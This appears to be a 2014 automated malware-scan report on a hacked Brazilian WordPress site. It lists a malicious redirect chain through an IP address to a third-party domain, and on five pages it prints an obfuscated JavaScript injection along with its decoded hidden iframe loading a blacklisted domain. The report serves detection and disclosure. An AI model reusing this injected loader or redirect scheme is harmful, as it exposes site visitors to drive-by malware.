New scan:

Malware Scanner report for ucem.com.br

Malicious/Suspicious/Total urls checked
5/0/36
5 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL. The chain of malicious redirects found:
->http://46.161.41.152/sds/go.php?sid=1
109 websites infected.
->http://doctorsro.com/


The website "ucem.com.br" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://www.ucem.com.br/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: www.ucem.com.br
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 29 Aug 2014 00:41:20 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
malicious
URL: http://46.161.41.152/sds/go.php?sid=1
(imitation of visitor from search engine)

GET /sds/go.php?sid=1 HTTP/1.1
Host: 46.161.41.152
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:26 GMT
Referer: http://www.google.com/url?sa=t&rct=j&q=www.ucem.com.br&source=web&cd=1&ved=0CDEQFjAG&url=http:%2F%2Fwww.ucem.com.br%2F&ei=wC7yT5qCJbCCkQKtnwE&usg=AFQjCNGEeYp3D7uuNLAJxMIVliLyQ9O_Pg
Location: http://doctorsro.com/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Set-Cookie: schema1=true; expires=Fri, 05-Sep-2014 00:41:26 GMT
Set-Cookie: visited1=1; expires=Fri, 05-Sep-2014 00:41:26 GMT
X-Powered-By: PHP/5.4.4-14+deb7u14
suspicious

Scanned pages/files

RequestServer responseStatus
http://www.ucem.com.br/
200 OK
Content-Length: 47986
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: economicprotection.biz

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('%')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['write'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%e200%o221%o220%i204%p226%o227%e200%t221%o221%.144%i227%/163%l219%o227%q159%c202%i168%486%>122%/152%f216%a206%e163'));

Decoded script:


<iframe src="http://economicprotection.biz/dvswzp.cgi?4" frameborder="0" style="width:0; height:0""></iframe>

http://www.ucem.com.br/wp-includes/js/jquery/jquery.js?ver=1.11.0
200 OK
Content-Length: 96402
Content-Type: application/javascript
clean
http://www.ucem.com.br/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://www.ucem.com.br/wp-content/plugins/wp-video-lightbox/js/jquery.prettyPhoto.js?ver=3.1.5
200 OK
Content-Length: 35243
Content-Type: application/javascript
clean
http://www.ucem.com.br/wp-content/plugins/wp-video-lightbox/js/video-lightbox.js?ver=3.1.5
200 OK
Content-Length: 6871
Content-Type: application/javascript
clean
http://www.ucem.com.br/wp-content/plugins/akismet/_inc/form.js?ver=3.0.2
200 OK
Content-Length: 700
Content-Type: application/javascript
clean
http://www.ucem.com.br/wp-includes/js/comment-reply.min.js?ver=3.9.2
200 OK
Content-Length: 757
Content-Type: application/javascript
clean
http://www.ucem.com.br/wp-content/themes/weaver-ii/js/weaverjslib.min.js?ver=2.1.12
200 OK
Content-Length: 10773
Content-Type: application/javascript
clean
http://www.ucem.com.br/sobre-o-ucem/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:29 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://46.161.41.152/sds/go.php?sid=1
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:34 GMT
Referer:
Location: http://doctorsro.com/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Set-Cookie: schema1=true; expires=Fri, 05-Sep-2014 00:41:34 GMT
Set-Cookie: visited1=1; expires=Fri, 05-Sep-2014 00:41:34 GMT
X-Powered-By: PHP/5.4.4-14+deb7u14
clean
http://doctorsro.com/
500 Server closed connection without sending any data back
Content-Length: 105
Content-Type: text/plain
clean
http://doctorsro.com/test404page.js
500 Server closed connection without sending any data back
Content-Length: 105
Content-Type: text/plain
clean
http://www.ucem.com.br/sobre-o-ucem/como-surgiu/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:29 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/sobre-o-ucem/o-que-e-e-o-que-diz/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:30 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/sobre-o-ucem/qual-a-ideia-central/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:30 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/sobre-o-ucem/o-que-e-o-milagre/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:31 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/sobre-o-ucem/o-que-e-o-milagre/principios-dos-milagres/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:31 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/sobre-o-ucem/o-que-e-perdao/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:32 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/sobre-o-ucem/o-que-e-expiacao/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:32 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/sobre-o-ucem/glossario/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:32 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/category/licoes_diarias/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:33 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/lillian-paes/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:33 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/a-historia-da-lili/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:33 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/livros/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:34 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/aulas-online/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:34 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/facim-fip/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:35 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/grupos-e-facilitadores-2/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:35 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/perguntas-e-respostas/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:35 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/novidades/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:36 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/aconselhamento/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:36 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/contato/
HTTP/1.1 302 Found
Connection: close
Date: Fri, 29 Aug 2014 00:41:36 GMT
Location: http://46.161.41.152/sds/go.php?sid=1
Server: Apache
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ucem.com.br/wp-content/uploads/2013/04/10256872_1407930256155219_4632072758119222610_o.jpg
200 OK
Content-Length: 104239
Content-Type: image/jpeg
clean
http://www.ucem.com.br/?replytocom=163
200 OK
Content-Length: 48055
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: economicprotection.biz

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('%')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['write'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%e200%o221%o220%i204%p226%o227%e200%t221%o221%.144%i227%/163%l219%o227%q159%c202%i168%486%>122%/152%f216%a206%e163'));

Decoded script:


<iframe src="http://economicprotection.biz/dvswzp.cgi?4" frameborder="0" style="width:0; height:0""></iframe>

http://www.ucem.com.br/?replytocom=187
200 OK
Content-Length: 48079
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: economicprotection.biz

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('%')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['write'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%e200%o221%o220%i204%p226%o227%e200%t221%o221%.144%i227%/163%l219%o227%q159%c202%i168%486%>122%/152%f216%a206%e163'));

Decoded script:


<iframe src="http://economicprotection.biz/dvswzp.cgi?4" frameborder="0" style="width:0; height:0""></iframe>

http://www.ucem.com.br/?replytocom=299
200 OK
Content-Length: 48071
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: economicprotection.biz

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('%')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['write'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%e200%o221%o220%i204%p226%o227%e200%t221%o221%.144%i227%/163%l219%o227%q159%c202%i168%486%>122%/152%f216%a206%e163'));

Decoded script:


<iframe src="http://economicprotection.biz/dvswzp.cgi?4" frameborder="0" style="width:0; height:0""></iframe>

http://www.ucem.com.br/?replytocom=435
200 OK
Content-Length: 48061
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: economicprotection.biz

z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = '';
for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('%')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++)
{_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['write'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%e200%o221%o220%i204%p226%o227%e200%t221%o221%.144%i227%/163%l219%o227%q159%c202%i168%486%>122%/152%f216%a206%e163'));

Decoded script:


<iframe src="http://economicprotection.biz/dvswzp.cgi?4" frameborder="0" style="width:0; height:0""></iframe>

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ucem.com.br

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ucem.com.br/

Result: ucem.com.br is not infected or malware details are not published yet.